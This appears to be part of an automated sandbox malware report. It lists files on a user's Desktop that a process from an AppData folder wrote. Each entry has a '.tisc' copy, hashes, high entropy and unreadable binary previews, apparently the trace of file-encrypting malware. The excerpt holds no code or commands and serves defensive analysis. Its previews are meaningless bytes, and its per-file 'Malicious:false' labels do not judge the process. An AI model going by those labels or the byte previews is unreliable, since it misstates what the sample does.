                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.831021873260298
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:af5WlQRr/sqzRm4+C9nzNdm3Ux+FwjrvShLGATWkgGwO9iG5dP/Nb7gbD:af5/R3f9BdNmSATWkVLH5dPVbuD
                                                                                    MD5:C41FF4BCDE97FDA715643C00C38D61ED
                                                                                    SHA1:178D3C85CE5391702EEFAC2516715A02FF8D79EF
                                                                                    SHA-256:0F0AD92DCABE00DF0BEC7C533F8F545EC79162E7EF93819E6ABE4ABC0F936D72
                                                                                    SHA-512:E0193A24D8E17DCC89B48E3C44605980900CE1179375157BF4F68AFC479DD67FB79E4163622DAB115BD3DD0B38E284A8130AE114D7B1E5D680E7B829394727DE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..F$V.c....6:...+.......s.?..C.j......Iz-........e.U..SD....Nm3.1."...:.........:...]b.%mb....0......j.W.-S..zb+..8S.) ...g*.bP..[......M.+.....{@.....c.*uXs-g.E.8g#O.J..z.8.....e.....oE...y...8j........{...87$.M....t..X.Z 5d.B........E.D..~...X'.@.&...@G....GEY.c....t.a.1.w..Zs..w..e.......... y{\..iLG...=.....)`...6.k....4d..[g.A3z.<N...P..j.....1..+.8?...[K....1...l(c.[.g.A...$.S1.i..?s...c...8..0..B....-..Z.n...b.Jl.+!.Q...A....4...........2.f..]G......-.&.....}...L."..Sw..t:-[P.L..W...)..R.4.8..84q=.f.....%.F.&...7.i.V.........,u~.:}y[.K<.......c(.{.E....W.Q...W,t`....I.8<.bl9tC./.^...#.=.....T..b..~Co..S`v.....:...r.X..Q.....\S0}..}.Q.TgoK...1..5?..M.W{.p...b.nV..............\.#J.W.~.v \.:`6b.D.w..(.....f.L.dO.ZA(...a+...E.H........8..<..{..........ih@#..f.%Pp........D..ex.......i..ct..\....N3....GJ..X.(....U.....;..0A.{.K...Y......Di.:r..a..q!N6I.5....] 1.m2......*...M..]..p..5u...UTsn.P......B..K.(...3...q.1...9.A....s.?..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861926802985309
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QSy6XiDwTVccZYLWwxpSzv9a9Kh+ySzN9EW9WLOhLkuNMY8ebPU/6jSdTrk+CgbD:QSy6XHpcc4WwxpQa9KoySzhULOhLkI1e
                                                                                    MD5:2A55BCB2C39CF5D3D0971795E2F63209
                                                                                    SHA1:BA44704ED2C9FCE67144625D56CCCE05BBB6B13E
                                                                                    SHA-256:89472EF975C0DC4367ED98C69AB708CA9A74A9850A459FF13DAE3236657AC5F6
                                                                                    SHA-512:AE727E449318370BF80AA2E4C45C3CC7CF4D62ED29F6CA48F8E8D262C343A831D0B77A960C55933B74568AD10312AEFBD7FEB0C0FDBCFB4FFE8A1AE4E98D1B03
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 3i#Y-......*...m.S. .w...011y....U...J.....A...C...I.K....&.:...UM.]j....r{.ER/.1.....V.+... ..P....b........G..+RV.Or.6...U%v..t.2r.<N..w...Q....1jD.S....~2....5......(.rI...n.O...g&..QA,[.T...._O..C.N..}{..:..@:l ....z.,$....-.(.R..N....R.:...0....r./t"o.q+n..[.i.'..^.a...s..j......N6.# o...P..)...NG... .............{...'.*^.5.`Ii@.;.B..z.<.Yu...{.....6...35k...PX....~.N...}.X..5..:l...z.#...g^_iw.eU...'..\B+..F.n...{..l...E....n....o......I....e&....]}..D.D....-$j...5..Y.(;C.....*,..N.&.|.I.........n.i.N >.D...w.. !.HQ.....&.=q.P.&...C...@..d.s..m...G......,..Af.{.C......Z....;vk.+.U.43.0u....n.T`B....RR..z=....:...J.|.V/ ......4v.{.j.*..xb..O./8.m.....c.m.......k..]H...&.O..K~...j`..i%f./."...T.....U..)..t..Q0....~).9...`K.te...n....c?.....(.i.0f...:.~..G2.G.f...\-X........Pj..|.m....j..C)1..r...WC..h&l.......)..U.u....M.'...m......2...f..}..P..".3.E..."j...A..q.m..@z...D....#.Q.bD%Q....?..H......F.Tz.K..h0`C.i.w......E*.s.....).
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861926802985309
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QSy6XiDwTVccZYLWwxpSzv9a9Kh+ySzN9EW9WLOhLkuNMY8ebPU/6jSdTrk+CgbD:QSy6XHpcc4WwxpQa9KoySzhULOhLkI1e
                                                                                    MD5:2A55BCB2C39CF5D3D0971795E2F63209
                                                                                    SHA1:BA44704ED2C9FCE67144625D56CCCE05BBB6B13E
                                                                                    SHA-256:89472EF975C0DC4367ED98C69AB708CA9A74A9850A459FF13DAE3236657AC5F6
                                                                                    SHA-512:AE727E449318370BF80AA2E4C45C3CC7CF4D62ED29F6CA48F8E8D262C343A831D0B77A960C55933B74568AD10312AEFBD7FEB0C0FDBCFB4FFE8A1AE4E98D1B03
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 3i#Y-......*...m.S. .w...011y....U...J.....A...C...I.K....&.:...UM.]j....r{.ER/.1.....V.+... ..P....b........G..+RV.Or.6...U%v..t.2r.<N..w...Q....1jD.S....~2....5......(.rI...n.O...g&..QA,[.T...._O..C.N..}{..:..@:l ....z.,$....-.(.R..N....R.:...0....r./t"o.q+n..[.i.'..^.a...s..j......N6.# o...P..)...NG... .............{...'.*^.5.`Ii@.;.B..z.<.Yu...{.....6...35k...PX....~.N...}.X..5..:l...z.#...g^_iw.eU...'..\B+..F.n...{..l...E....n....o......I....e&....]}..D.D....-$j...5..Y.(;C.....*,..N.&.|.I.........n.i.N >.D...w.. !.HQ.....&.=q.P.&...C...@..d.s..m...G......,..Af.{.C......Z....;vk.+.U.43.0u....n.T`B....RR..z=....:...J.|.V/ ......4v.{.j.*..xb..O./8.m.....c.m.......k..]H...&.O..K~...j`..i%f./."...T.....U..)..t..Q0....~).9...`K.te...n....c?.....(.i.0f...:.~..G2.G.f...\-X........Pj..|.m....j..C)1..r...WC..h&l.......)..U.u....M.'...m......2...f..}..P..".3.E..."j...A..q.m..@z...D....#.Q.bD%Q....?..H......F.Tz.K..h0`C.i.w......E*.s.....).
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.813632561226543
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:UmDr7EPCq3XEvDzMc6URAo/ohabSDRXRFozA+/LDeAmrsugbD:UWPezXEvMUB/4VRXR2PjSAhrD
                                                                                    MD5:6941EF31600255BCCFCB6B690931945A
                                                                                    SHA1:7E5D85D720041714C6C26E5D64B305E5FAC11E5B
                                                                                    SHA-256:2C23F869DCE7E364A02257F38561867AFA710503BF03B4113F9AAAE07852EA2B
                                                                                    SHA-512:99FD05A83423AA264E0B99C80A4DBC9A15921C5EC55E1CC17D41721FDC77BC46C5E5B24BF4F2B243D49C7F54D315EAD506D16A33998D6596405265D266C4D008
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......>..-....z.e>.ox..y-..G...!.EE....U.i]Fi...%.d6qo.l....J.v.k.K...tJ...o5.?.?&.6..u...#.]Y=.J....:b..k.... .g..$..G...5.o..]mz.2m.38q.$...T8.K.kK...O.,..<....Y......Y|L...6t.-.......x.......;3C ...y...^c...@......X.z=......5.H.....:}s7...U.T.hU-.....D....k.k....#....Uh!...%Bq......'-....G..?`.:.u.VJw.... _.K......T.hD..+n.:..7........U;..J...h...6..,..L/.l..Uka6q.u.'.......?~..g...m.x...?...L..{...y}..Dq.....{`.+.t.N.._aE"...Y$8.>V...A...l.R..qf^..c..#Mp.....g..%.|...Ew.?M5..tX4K...K."......V./....v...wu....iIN..PT.U.-+.............Q....K....jmU.B&.....W[.(..s.0......`O.\...G..`.F1....s....O...,.....@..:...5.<.....e.@...c.....~3...JI9.*D7..Lu..L....}.T......+.....;...8..r&K..2._..R.1P... .8L.......W'S.d!....+,K........u...L...B%./A.R.zr.%2.`.....+.cc.+./..]..e`X.pv.5D...;hU...b...HK..#..6!.Mz.....<..d......~.w==7*..k....`}.fsl=........b...h2......E...p..4..e\c7...m....7..+/.1"*]%....]..s.....DgD.w]z'H.....140.[..y#T..2..`..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.813632561226543
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:UmDr7EPCq3XEvDzMc6URAo/ohabSDRXRFozA+/LDeAmrsugbD:UWPezXEvMUB/4VRXR2PjSAhrD
                                                                                    MD5:6941EF31600255BCCFCB6B690931945A
                                                                                    SHA1:7E5D85D720041714C6C26E5D64B305E5FAC11E5B
                                                                                    SHA-256:2C23F869DCE7E364A02257F38561867AFA710503BF03B4113F9AAAE07852EA2B
                                                                                    SHA-512:99FD05A83423AA264E0B99C80A4DBC9A15921C5EC55E1CC17D41721FDC77BC46C5E5B24BF4F2B243D49C7F54D315EAD506D16A33998D6596405265D266C4D008
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......>..-....z.e>.ox..y-..G...!.EE....U.i]Fi...%.d6qo.l....J.v.k.K...tJ...o5.?.?&.6..u...#.]Y=.J....:b..k.... .g..$..G...5.o..]mz.2m.38q.$...T8.K.kK...O.,..<....Y......Y|L...6t.-.......x.......;3C ...y...^c...@......X.z=......5.H.....:}s7...U.T.hU-.....D....k.k....#....Uh!...%Bq......'-....G..?`.:.u.VJw.... _.K......T.hD..+n.:..7........U;..J...h...6..,..L/.l..Uka6q.u.'.......?~..g...m.x...?...L..{...y}..Dq.....{`.+.t.N.._aE"...Y$8.>V...A...l.R..qf^..c..#Mp.....g..%.|...Ew.?M5..tX4K...K."......V./....v...wu....iIN..PT.U.-+.............Q....K....jmU.B&.....W[.(..s.0......`O.\...G..`.F1....s....O...,.....@..:...5.<.....e.@...c.....~3...JI9.*D7..Lu..L....}.T......+.....;...8..r&K..2._..R.1P... .8L.......W'S.d!....+,K........u...L...B%./A.R.zr.%2.`.....+.cc.+./..]..e`X.pv.5D...;hU...b...HK..#..6!.Mz.....<..d......~.w==7*..k....`}.fsl=........b...h2......E...p..4..e\c7...m....7..+/.1"*]%....]..s.....DgD.w]z'H.....140.[..y#T..2..`..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.836573060407606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tlvdW1iUOmfVLvGJXUhv3vNJm28efysl7GFxkntmlgdna2+eyX37WVkXOg9lgbD:tldUFfRcS3FJLOeSgtmG+rXrnO1D
                                                                                    MD5:90ACDEA410C8A6D1A889E133F2EB4109
                                                                                    SHA1:EAC7B5114E562ABBBE789A0284D0455E5C4A53C2
                                                                                    SHA-256:21471DD23FAC23BE862444EC1AE57B00FBAF4AEFC6224794A97B0B1098C67E1B
                                                                                    SHA-512:EC987AC3F9E277A5620CBC3D71FF759E2C33070DE7D70294C25B4549BF42B9D9C06EA1F9888763BBE77C0B0D995F91FA99B21C0981CAACA60832D10B4EE3B896
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .:Y.....n..SP.7..p..!.k...Y8....F...Q.z...O..w..vN.|../.<..d<0q.\Oy...C...6.:.T...`q.YL..E...!z.M.....S.....S~*E.%....&7T..)|.sM".[....R....n...:a............&.~..AB.....:#.9.=.......M.=8..7)mloq4..P..0..a.R..Nj.....g.tx...O4A..{...bw.V!....-E.].S..&@.....d(....H.Z..;2*....i....F.1..L........V70.*p.a.s...p%.....t%`.W,.sK...i....\R......m..w"...z./N6..'j0...`W...W..Xd....T(].7.r....[.B}..<....c.t...z>...h.W4o'..H..g@.......,.N.`|.9:.-......v]..l..uQ.Ou.yyR.&<..#.....6WP....u..V.2.1....>.yE.|lzJ..bzI&..R.).Q....(.l.uJ....r.....ft.J..K.!'h..u~..)$/.]0...XS...m...$y8..;..Ti.,4[j]lg..N..d.{SSF.?.CRG..A+F.:.mR2.xE)CT@...;..2r..o.]$`T.....[y.tH...H..M.`..J.z.(.d..f.9F..w.z...mB5....n....A:....J....wf..`oY.0...)......5..<L.............E.}?V.?.EHl..x.}it.B.....Y.a..-...V...az.@S8[..\..V..#Y..|..}.k9..1....!..W.-..L..-$.Q..5.......p[t;...dA.7....;p=.w.w...X...qT.+.......HfB.+..l.zD..G.%.....r[.@.^]..`.P.Qi.......C.]T..:._n.k_..-..1Ca.....//.Yo........d
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.836573060407606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tlvdW1iUOmfVLvGJXUhv3vNJm28efysl7GFxkntmlgdna2+eyX37WVkXOg9lgbD:tldUFfRcS3FJLOeSgtmG+rXrnO1D
                                                                                    MD5:90ACDEA410C8A6D1A889E133F2EB4109
                                                                                    SHA1:EAC7B5114E562ABBBE789A0284D0455E5C4A53C2
                                                                                    SHA-256:21471DD23FAC23BE862444EC1AE57B00FBAF4AEFC6224794A97B0B1098C67E1B
                                                                                    SHA-512:EC987AC3F9E277A5620CBC3D71FF759E2C33070DE7D70294C25B4549BF42B9D9C06EA1F9888763BBE77C0B0D995F91FA99B21C0981CAACA60832D10B4EE3B896
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .:Y.....n..SP.7..p..!.k...Y8....F...Q.z...O..w..vN.|../.<..d<0q.\Oy...C...6.:.T...`q.YL..E...!z.M.....S.....S~*E.%....&7T..)|.sM".[....R....n...:a............&.~..AB.....:#.9.=.......M.=8..7)mloq4..P..0..a.R..Nj.....g.tx...O4A..{...bw.V!....-E.].S..&@.....d(....H.Z..;2*....i....F.1..L........V70.*p.a.s...p%.....t%`.W,.sK...i....\R......m..w"...z./N6..'j0...`W...W..Xd....T(].7.r....[.B}..<....c.t...z>...h.W4o'..H..g@.......,.N.`|.9:.-......v]..l..uQ.Ou.yyR.&<..#.....6WP....u..V.2.1....>.yE.|lzJ..bzI&..R.).Q....(.l.uJ....r.....ft.J..K.!'h..u~..)$/.]0...XS...m...$y8..;..Ti.,4[j]lg..N..d.{SSF.?.CRG..A+F.:.mR2.xE)CT@...;..2r..o.]$`T.....[y.tH...H..M.`..J.z.(.d..f.9F..w.z...mB5....n....A:....J....wf..`oY.0...)......5..<L.............E.}?V.?.EHl..x.}it.B.....Y.a..-...V...az.@S8[..\..V..#Y..|..}.k9..1....!..W.-..L..-$.Q..5.......p[t;...dA.7....;p=.w.w...X...qT.+.......HfB.+..l.zD..G.%.....r[.@.^]..`.P.Qi.......C.]T..:._n.k_..-..1Ca.....//.Yo........d
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845287471051355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tgWzfDIAp/yc5+oW6tv2Z3Qe8ld8pLNtMXJoiq6fXTuSpetw3DxvRKgbD:2Wz3Ry+xtv2q0pNyXBjuUetw33D
                                                                                    MD5:0362DA9723A04F96A570196BE15DBC8D
                                                                                    SHA1:AB9B87E021FC2AB8BD55AC5AACCAE8409FDED3E4
                                                                                    SHA-256:BAA2FD404B30AFA4454B9AC4B104DD243BFD40A179F12CBBCB8044B7E65C30BB
                                                                                    SHA-512:101F13731003C4B1E9F67FAC59E4014B7C1926EC66B2100C4BCA9E9A4AA4D1BBB717AD707BD3A33AC76FBAB831CC3840237C725C33D8888F3632116DC1A5B481
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .s`.@.YF.6.(A..yN..{./.....`.<.4a..P.w.t...<..?...<#`...<O...J.......:.R%0.(.....[U("..~............p....G.4|[..R7..... ....Xl*.4B......t...y..0e.D.JO...{....ZH._#.]R...d.N...,2qH.U..m.....S..z%...j/.2....5[B.........OG..+tm....P..K5.....d....,.H^...I....Kjd..|.B.Bn..0jg"pl..!..W.+...j..J_...,.^..H.:7i.A.H*G..:4.\.N..S.W@..L0C..y...d... vs0.....]..C2.v...6I ..%@{.....M.......S..../k'..z*...k..P.#.......W..F_..N....I..o..~0...0..(>..U.}...h...7.....%R.F .../........d=.)./.M..KX.-pKe..X...F..+.f..dEhy.J.[9I.Q....Z..Vm...Y..k.....oY...aS...J.nN.D9j........]..u.K.N.,k7ytzi..;>`)C+ft....(..8K..$....6.....).|+N.l.|.k..K....J+Q...W<m../.w.t.]...b^..7..~..j-.M,.Mv..7.}.*N...^.'i.C.v..-."..|&..9....*..am._.I....^~+k......t.yL."....u.8}..P....T..q.`.h....s..b+2....y].E.D.S.l&.K^..)..qHA.=..>).z.._... .....w/n.....w...v..^..F<.......y~.R.h.L.._.@bt#Y....^f..<.......Nk.1...[g..].on..<."w....~..o.....5...fr4........fN... .._0...d.G.D..\.2h..A.eD..m
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845287471051355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tgWzfDIAp/yc5+oW6tv2Z3Qe8ld8pLNtMXJoiq6fXTuSpetw3DxvRKgbD:2Wz3Ry+xtv2q0pNyXBjuUetw33D
                                                                                    MD5:0362DA9723A04F96A570196BE15DBC8D
                                                                                    SHA1:AB9B87E021FC2AB8BD55AC5AACCAE8409FDED3E4
                                                                                    SHA-256:BAA2FD404B30AFA4454B9AC4B104DD243BFD40A179F12CBBCB8044B7E65C30BB
                                                                                    SHA-512:101F13731003C4B1E9F67FAC59E4014B7C1926EC66B2100C4BCA9E9A4AA4D1BBB717AD707BD3A33AC76FBAB831CC3840237C725C33D8888F3632116DC1A5B481
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .s`.@.YF.6.(A..yN..{./.....`.<.4a..P.w.t...<..?...<#`...<O...J.......:.R%0.(.....[U("..~............p....G.4|[..R7..... ....Xl*.4B......t...y..0e.D.JO...{....ZH._#.]R...d.N...,2qH.U..m.....S..z%...j/.2....5[B.........OG..+tm....P..K5.....d....,.H^...I....Kjd..|.B.Bn..0jg"pl..!..W.+...j..J_...,.^..H.:7i.A.H*G..:4.\.N..S.W@..L0C..y...d... vs0.....]..C2.v...6I ..%@{.....M.......S..../k'..z*...k..P.#.......W..F_..N....I..o..~0...0..(>..U.}...h...7.....%R.F .../........d=.)./.M..KX.-pKe..X...F..+.f..dEhy.J.[9I.Q....Z..Vm...Y..k.....oY...aS...J.nN.D9j........]..u.K.N.,k7ytzi..;>`)C+ft....(..8K..$....6.....).|+N.l.|.k..K....J+Q...W<m../.w.t.]...b^..7..~..j-.M,.Mv..7.}.*N...^.'i.C.v..-."..|&..9....*..am._.I....^~+k......t.yL."....u.8}..P....T..q.`.h....s..b+2....y].E.D.S.l&.K^..)..qHA.=..>).z.._... .....w/n.....w...v..^..F<.......y~.R.h.L.._.@bt#Y....^f..<.......Nk.1...[g..].on..<."w....~..o.....5...fr4........fN... .._0...d.G.D..\.2h..A.eD..m
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843009665327425
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:cMz/OUpS5b+1p9wv/0ApDo+UIRFXMtF802e8r6+b5fBdaJhX3J9//YI/KgU23KgX:9/OTJlvsApDJRFXMgH5BdaJhX33wI/Kq
                                                                                    MD5:E70389DF5131426CF0B0A8DF9161A453
                                                                                    SHA1:34CF06A8011C70805E37C97B8477DC20B4743EFB
                                                                                    SHA-256:71ECDC9198D3A1C322C61E6FA4D1D33DB0104B403216DE2991D878D9DFFC09CB
                                                                                    SHA-512:8FC27451A576AA3E39F1833F6E34E70355B08866AB1911A71973246A4DEA565E4F6A5E7D32A56BB2992D58D680AEBF0A3917018EC6F364253021DF4325C1CDFB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ~..E.t..1....>....6deL..e.#t....[............~....O06.).3S..v[r...77:?2.M.t[(..7...o\.pS*3.1..v...G.....#.uN.,e.. d...,..e..6....s.i.|..glj.....J...7\.QD..1........ ...U...g6".f..u!x;.f.PP..w..{..'.........N....z...b...'.)k.....7....u....v..*...s3.X:..wVC...D7....mQ....l.x...c.9....=.9.....l...p.OFnA}....5.$x.....6.D...0..I.<.#Y.j..\.|.....,].......&<w".....'.O..j}.S.>..}8J...@/.....nx.2f;.xd`%..j.Z..\..!../H.._u@Y.ck),...*./.%. ..R..S.z'..@.l.A;..o.....e-+..t.*.7.../.../!......!.]M.e....,p67.....X.W....&IUZ.A.:....6q}..~.$.3....{>z\.%~...0..6..u*....Y......8...n7O....>;>......om..`v*.ka..8.AI$...~.3.f...S....'.q.DK.O.U.AM/W`e.^.q`...m....Ku|.....z6..qF...r?e7....T.V..x.....U...#......?......Xxa.n..!.....c....^.K.J.|.5....J..zG......e@AU.....|.G..Dl.L.B}bh.|.0.i....y......j.sIlq.."=C8K.E&F...Pf.....y..!Ox..e..,...<...s?.{<.P.D.......Hw.....5....R./.._...D...G./c....{.g.?..I...p.7....~w......T...:_...~.3o..xQ.l[.'A..x.(|..aIbr.q0b
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843009665327425
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:cMz/OUpS5b+1p9wv/0ApDo+UIRFXMtF802e8r6+b5fBdaJhX3J9//YI/KgU23KgX:9/OTJlvsApDJRFXMgH5BdaJhX33wI/Kq
                                                                                    MD5:E70389DF5131426CF0B0A8DF9161A453
                                                                                    SHA1:34CF06A8011C70805E37C97B8477DC20B4743EFB
                                                                                    SHA-256:71ECDC9198D3A1C322C61E6FA4D1D33DB0104B403216DE2991D878D9DFFC09CB
                                                                                    SHA-512:8FC27451A576AA3E39F1833F6E34E70355B08866AB1911A71973246A4DEA565E4F6A5E7D32A56BB2992D58D680AEBF0A3917018EC6F364253021DF4325C1CDFB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ~..E.t..1....>....6deL..e.#t....[............~....O06.).3S..v[r...77:?2.M.t[(..7...o\.pS*3.1..v...G.....#.uN.,e.. d...,..e..6....s.i.|..glj.....J...7\.QD..1........ ...U...g6".f..u!x;.f.PP..w..{..'.........N....z...b...'.)k.....7....u....v..*...s3.X:..wVC...D7....mQ....l.x...c.9....=.9.....l...p.OFnA}....5.$x.....6.D...0..I.<.#Y.j..\.|.....,].......&<w".....'.O..j}.S.>..}8J...@/.....nx.2f;.xd`%..j.Z..\..!../H.._u@Y.ck),...*./.%. ..R..S.z'..@.l.A;..o.....e-+..t.*.7.../.../!......!.]M.e....,p67.....X.W....&IUZ.A.:....6q}..~.$.3....{>z\.%~...0..6..u*....Y......8...n7O....>;>......om..`v*.ka..8.AI$...~.3.f...S....'.q.DK.O.U.AM/W`e.^.q`...m....Ku|.....z6..qF...r?e7....T.V..x.....U...#......?......Xxa.n..!.....c....^.K.J.|.5....J..zG......e@AU.....|.G..Dl.L.B}bh.|.0.i....y......j.sIlq.."=C8K.E&F...Pf.....y..!Ox..e..,...<...s?.{<.P.D.......Hw.....5....R./.._...D...G./c....{.g.?..I...p.7....~w......T...:_...~.3o..xQ.l[.'A..x.(|..aIbr.q0b
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861535146687928
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MBkaW+ScWOjhtpYSo9qT5fB/9xaC8/PjIs3bQtmqBSvzQhhagbD:QzW+wwhXYSmqT3aCccsLQwqovUhxD
                                                                                    MD5:3DE1F98F3A577BB8D320DBBACFBB4915
                                                                                    SHA1:3606EB3E48E54E68CB2FD046F9CF110389E5CA29
                                                                                    SHA-256:83448352160ACF5358F8FE0FA773B7A79CC8A89C6F8FDF679EBC425B72FCAB8E
                                                                                    SHA-512:7180766AC2687937C78AFEA8A89746715BA6398C57F77C17BDA1ED6A80C5431592B6412A19D66D562F1886208EEC3BF8265D509473A5EE31324C3842D51C8B7B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......5@j..".#..b-y6.9u..."9..,.I...7...K.-.i_+fD.....O-..x........D.i.......b.5...k...x5._...z...K.i./.LC9.v.N..oe._...>%.&A.x.s>........N.M..v....<O..A.....9....\Kd..k.I&....&M..2'..h..........>.^9.Z../o4..*....mi.....].b...k..6..Ei.5Q...n...J.M..{.;.*..1.b..P.L.t~|..f...K$.O.....T.A+.Mm.\.L#.........g.G.A.....q..!....nc9H..~.d...../...^.........1..c._..f.M..l.1.<.>f.O...:T6z..f.|'De.....P.zm..V#.....&..F *.!...G....=....jE...O..BF.u.._6h9L..9.<`*wozP........:[....q3..gp........w.R..8.,..=.&8..U.O.ho.#:.....%+..q..c;......;z!...L1....X(>n.0.e....l....g...(...{.]Q.&...9...86..-.m.:..3;.[.'....}..L..Jh.`.7......g...,...>..n..Hc^8...S"$..f.&1fgf ...7.<t..@..o.*.;6.B`...v....=.v..#g&.`J\1......R.ks.+K..g.......*.,.x..V\x..P..A...L.S........".?W*~.|.....RK........C.k.....-..F...M.N_.......R-......y....A)...P. o.=N.W|mb..2.. S..T.s.....`...K.(....N(..wD..b.bZ.8.5.d.Q6..._..7j.$......f.C..W..]..O.....E.x.......F.:.. ..W.y..-....
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861535146687928
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MBkaW+ScWOjhtpYSo9qT5fB/9xaC8/PjIs3bQtmqBSvzQhhagbD:QzW+wwhXYSmqT3aCccsLQwqovUhxD
                                                                                    MD5:3DE1F98F3A577BB8D320DBBACFBB4915
                                                                                    SHA1:3606EB3E48E54E68CB2FD046F9CF110389E5CA29
                                                                                    SHA-256:83448352160ACF5358F8FE0FA773B7A79CC8A89C6F8FDF679EBC425B72FCAB8E
                                                                                    SHA-512:7180766AC2687937C78AFEA8A89746715BA6398C57F77C17BDA1ED6A80C5431592B6412A19D66D562F1886208EEC3BF8265D509473A5EE31324C3842D51C8B7B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
